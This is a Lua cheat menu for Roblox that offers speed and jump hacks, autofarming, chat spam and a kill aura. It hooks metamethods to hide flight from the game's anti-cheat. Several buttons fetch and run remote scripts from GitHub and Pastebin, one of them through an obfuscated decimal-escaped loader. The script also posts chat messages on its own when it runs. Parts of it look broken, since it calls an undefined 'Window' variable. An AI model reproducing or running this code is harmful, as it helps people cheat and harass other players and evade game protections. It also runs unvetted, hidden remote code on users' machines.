--script creado por alberyo79
local kavoUI =  loadstring(game:HttpGet("https://raw.githubusercontent.com/vqfx/SytroNight4ROBLOX/main/libraries/kavo.lua"))() 
local window = kavoUI.CreateLib("coca colaHUB", "BloodTheme")

-- MAIN
local Main = Window:NewTab("Main")
local MainSection = Main:NewSection("Main")


MainSection:NewButton("spam", "toxic", function()
   local args = {
    [1] = "ez noob",
    [2] = "All"
} 

game:GetService("ReplicatedStorage"):WaitForChild("DefaultChatSystemChatEvents"):WaitForChild("SayMessageRequest"):FireServer(unpack(args))
end)


MainSection:NewButton("god mode", "te regenera", function()
    game.Players.LocalPlayer.Character:MoveTo(Vector3.new(-15.48, 788.69, 52.13))
end)  


MainSection:NewButton("infinite yeld", "admin", function()
   loadstring(game:HttpGet('https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source'))()
end)

MainSection:NewButton("isla", "Teleport en la isla", function()
    game.Players.LocalPlayer.Character:MoveTo(Vector3.new(63.32, 666.55, 14.04))
end)


--LOCAL PLAYER
local Player = Window:NewTab("Player")
local PlayerSection = Player:NewSection("Player")

PlayerSection:NewSlider("Walkspeed", "caminar rapido", 500, 16, function(s) 
    game.Players.LocalPlayer.Character.Humanoid.WalkSpeed = s
end)

PlayerSection:NewSlider("Jumppower", "saltas alto", 350, 50, function(s) 
    game.Players.LocalPlayer.Character.Humanoid.JumpPower = s
end)

PlayerSection:NewButton("Reset WS/JP ", "reset  speed and jumppower", function()
    game.Players.LocalPlayer.Character.Humanoid.JumpPower = 50
    game.Players.LocalPlayer.Character.Humanoid.WalkSpeed = 16
end)


--Other
local Other = Window:NewTab("Other")
local OtherSection = Other:NewSection("Other")

OtherSection:NewButton("fly mobile ", "puedes volar", function()
    loadstring("\108\111\97\100\115\116\114\105\110\103\40\103\97\109\101\58\72\116\116\112\71\101\116\40\40\39\104\116\116\112\115\58\47\47\103\105\115\116\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\109\101\111\122\111\110\101\89\84\47\98\102\48\51\55\100\102\102\57\102\48\97\55\48\48\49\55\51\48\52\100\100\100\54\55\102\100\99\100\51\55\48\47\114\97\119\47\101\49\52\101\55\52\102\52\50\53\98\48\54\48\100\102\53\50\51\51\52\51\99\102\51\48\98\55\56\55\48\55\52\101\98\51\99\53\100\50\47\97\114\99\101\117\115\37\50\53\50\48\120\37\50\53\50\48\102\108\121\37\50\53\50\48\50\37\50\53\50\48\111\98\102\108\117\99\97\116\111\114\39\41\44\116\114\117\101\41\41\40\41\10\10")()
end)

OtherSection:NewKeybind("keybind", "cerrar el menu o abrirlo", Enum.KeyCode.F, function()
	Library:ToggleUI()
end)

OtherSection:NewButton("infjump ", "saltos infinitos", function()
  game:GetService("UserInputService").JumpRequest:connect(function() game:GetService("Players").LocalPlayer.Character:FindFirstChildOfClass('Humanoid'):ChangeState("Jumping") end)
end)

OtherSection:NewButton("Bypass Fly ", "puedes volar sin morir", function()
  local plr = game:GetService("Players").LocalPlayer;

local old;
old = hookmetamethod(game, "__index", function(self, key)
   if not checkcaller() and key == "PlatformStand" and self.ClassName == "Humanoid" and self.Parent and plr.Character and self.Parent == plr.Character then -- Prevents PlatformStanding detections
       return false
   end
   return old(self, key)
end)

game.DescendantAdded:Connect(function(d)
   if d.ClassName:find("Body") and plr.Character and d:IsDescendantOf(plr.Character) then
       
       local old_idx;
       local old_nc;
       
       old_idx = hookmetamethod(d, "__index", newcclosure(function(self, ...) -- Prevent indexing (checking properties, name, etc)
           if not checkcaller() and self == d then
               local s,e = pcall(old_idx, self, ...)
               
               if not s then
                   return error(e)
               end
               return
           end
           return old_idx(self, ...)
       end))
       
       old_nc = hookmetamethod(d, "__namecall", newcclosure(function(self, ...) -- Prevent namecalling (functions)
           if not checkcaller() and self == d then
               local s,e = pcall(old_nc, self, ...)
               
               if not s then
                   return error(e)
               end
               return
           end
           return old_nc(self, ...)
       end))
   end
end)
end)

OtherSection:NewButton("autofarm", "mina los minerales", function()
 local cpos = game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame

	local stuff = workspace:getDescendants()
	for i=1,#stuff do
		if stuff[i].Name == "Block" and stuff[i].Parent.Name == "Ores" then
			repeat
				wait()
				game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = stuff[i].CFrame
				game.Players.LocalPlayer.Character.Axe.RemoteEvent:FireServer(stuff[i])
			until stuff[i].Name ~= "Block" or not game.Players.LocalPlayer.Character:findFirstChild("Axe")
		end
	end

	game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = cpos
    end)

    OtherSection:NewButton("sword mesh ", "sword mesh", function()
 local playerName = game.Players.LocalPlayer.Name
	    game.Workspace:FindFirstChild(playerName).Sword.Handle.Mesh:Destroy()
    end)

    OtherSection:NewButton("God mode", "shield inf", function()
  local playerName = game.Players.LocalPlayer.Name

        game.Players.LocalPlayer.Character:FindFirstChild("Shield"):Activate()
        wait (1)
        game.Workspace:FindFirstChild(playerName).Shield.ShieldPotion:Destroy()
    end)

    OtherSection:NewButton("SwordFightBot", "Swordbot", function()
 loadstring(game:HttpGet(('https://raw.githubusercontent.com/EpikBirdo/ok-and/main/bigchungusporn'),true))()
    end)
 
 OtherSection:NewButton("Realistic Mode", "real", function()
	if not _G.FullBrightExecuted then

	_G.FullBrightEnabled = false

	_G.NormalLightingSettings = {
		Brightness = game:GetService("Lighting").Brightness,
		ClockTime = game:GetService("Lighting").ClockTime,
		FogEnd = game:GetService("Lighting").FogEnd,
		GlobalShadows = game:GetService("Lighting").GlobalShadows,
		Ambient = game:GetService("Lighting").Ambient
	}

	game:GetService("Lighting"):GetPropertyChangedSignal("Brightness"):Connect(function()
		if game:GetService("Lighting").Brightness ~= 1 and game:GetService("Lighting").Brightness ~= _G.NormalLightingSettings.Brightness then
			_G.NormalLightingSettings.Brightness = game:GetService("Lighting").Brightness
			if not _G.FullBrightEnabled then
				repeat
					wait()
				until _G.FullBrightEnabled
			end
			game:GetService("Lighting").Brightness = 1
		end
	end)

	game:GetService("Lighting"):GetPropertyChangedSignal("ClockTime"):Connect(function()
		if game:GetService("Lighting").ClockTime ~= 12 and game:GetService("Lighting").ClockTime ~= _G.NormalLightingSettings.ClockTime then
			_G.NormalLightingSettings.ClockTime = game:GetService("Lighting").ClockTime
			if not _G.FullBrightEnabled then
				repeat
					wait()
				until _G.FullBrightEnabled
			end
			game:GetService("Lighting").ClockTime = 12
		end
	end)

	game:GetService("Lighting"):GetPropertyChangedSignal("FogEnd"):Connect(function()
		if game:GetService("Lighting").FogEnd ~= 786543 and game:GetService("Lighting").FogEnd ~= _G.NormalLightingSettings.FogEnd then
			_G.NormalLightingSettings.FogEnd = game:GetService("Lighting").FogEnd
			if not _G.FullBrightEnabled then
				repeat
					wait()
				until _G.FullBrightEnabled
			end
			game:GetService("Lighting").FogEnd = 786543
		end
	end)

	game:GetService("Lighting"):GetPropertyChangedSignal("GlobalShadows"):Connect(function()
		if game:GetService("Lighting").GlobalShadows ~= false and game:GetService("Lighting").GlobalShadows ~= _G.NormalLightingSettings.GlobalShadows then
			_G.NormalLightingSettings.GlobalShadows = game:GetService("Lighting").GlobalShadows
			if not _G.FullBrightEnabled then
				repeat
					wait()
				until _G.FullBrightEnabled
			end
			game:GetService("Lighting").GlobalShadows = false
		end
	end)

	game:GetService("Lighting"):GetPropertyChangedSignal("Ambient"):Connect(function()
		if game:GetService("Lighting").Ambient ~= Color3.fromRGB(178, 178, 178) and game:GetService("Lighting").Ambient ~= _G.NormalLightingSettings.Ambient then
			_G.NormalLightingSettings.Ambient = game:GetService("Lighting").Ambient
			if not _G.FullBrightEnabled then
				repeat
					wait()
				until _G.FullBrightEnabled
			end
			game:GetService("Lighting").Ambient = Color3.fromRGB(178, 178, 178)
		end
	end)

	game:GetService("Lighting").Brightness = 1
	game:GetService("Lighting").ClockTime = 12
	game:GetService("Lighting").FogEnd = 786543
	game:GetService("Lighting").GlobalShadows = false
	game:GetService("Lighting").Ambient = Color3.fromRGB(178, 178, 178)

	local LatestValue = true
	spawn(function()
		repeat
			wait()
		until _G.FullBrightEnabled
		while wait() do
			if _G.FullBrightEnabled ~= LatestValue then
				if not _G.FullBrightEnabled then
					game:GetService("Lighting").Brightness = _G.NormalLightingSettings.Brightness
					game:GetService("Lighting").ClockTime = _G.NormalLightingSettings.ClockTime
					game:GetService("Lighting").FogEnd = _G.NormalLightingSettings.FogEnd
					game:GetService("Lighting").GlobalShadows = _G.NormalLightingSettings.GlobalShadows
					game:GetService("Lighting").Ambient = _G.NormalLightingSettings.Ambient
				else
					game:GetService("Lighting").Brightness = 1
					game:GetService("Lighting").ClockTime = 12
					game:GetService("Lighting").FogEnd = 786543
					game:GetService("Lighting").GlobalShadows = false
					game:GetService("Lighting").Ambient = Color3.fromRGB(178, 178, 178)
				end
				LatestValue = not LatestValue
			end
		end
	end)
end

_G.FullBrightExecuted = true
_G.FullBrightEnabled = not _G.FullBrightEnabled
end)	

  OtherSection:NewButton("Killplates", "eliminar", function()
      game.workspace.Lobby.KillPlates:remove()
        game.workspace.Borders.InvisibleBorder:remove()
        end)

local args = {
    [1] = "Alberyo79 is pro",
    [2] = "All"
} 

game:GetService("ReplicatedStorage"):WaitForChild("DefaultChatSystemChatEvents"):WaitForChild("SayMessageRequest"):FireServer(unpack(args))

   OtherSection:NewButton("destroy sword animation", "eliminar", function()
local playerName = game.Players.LocalPlayer.Name
	    game.Workspace:FindFirstChild(playerName).Sword.LocalSwordAnimation:Destroy()
     end)

OtherSection:NewButton("speed", "skywars", function()
 getgenv().WalkSpeedValue = 29; -- Cambia el 100 por el valor que quieras
local Player = game:service'Players'.LocalPlayer;
Player.Character.Humanoid:GetPropertyChangedSignal'WalkSpeed':Connect(function()
Player.Character.Humanoid.WalkSpeed = getgenv().WalkSpeedValue;
end)
Player.Character.Humanoid.WalkSpeed = getgenv().WalkSpeedValue;
end)

OtherSection:NewButton("Axe mesh", "Axe mesh", function()
  local playerName = game.Players.LocalPlayer.Name
	    game.Workspace:FindFirstChild(playerName).Axe.Handle.Mesh:Destroy()
    end)

OtherSection:NewButton("Bow mesh", "Bow mesh", function()
  local playerName = game.Players.LocalPlayer.Name
	    game.Workspace:FindFirstChild(playerName).Bow.Handle.Mesh:Destroy()
    end)

--OP
local OP = Window:NewTab("OP")
local OPSection = OP:NewSection("OP")

OPSection:NewButton("kill aura", "matar a todos", function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/coca001/kill-aura-pro/main/source"))()
end)

OPSection:NewButton("Sky destroy", "destruir", function()
game.Lighting.Sky:Destroy()
end)

OPSection:NewButton("Sky galaxy", "galaxy", function()
local lighting = game:GetService("Lighting")
wait(15)
lighting.ClockTime = 6

wait(10)
lighting.ClockTime = 20
end)

OPSection:NewButton("Armor troll", "Armor", function()
character = game:GetService("Players").LocalPlayer.Character

--R6 Rigs
rightLeg = character:FindFirstChild("Right Leg")
if rightLeg then rightLeg:Destroy() end
end)

OPSection:NewButton("Armor", "usar cuando pulses Troll Armor", function()
game.Players.LocalPlayer.Character:MoveTo(Vector3.new(-11.26, 263.52, 61.06))
end)

OPSection:NewButton("Hat spin Fe", "Info", function()
loadstring(game:HttpGet("https://pastebin.com/raw/wZn7yAB7",true))()
end)

--extras on run
print ("coca on top") 
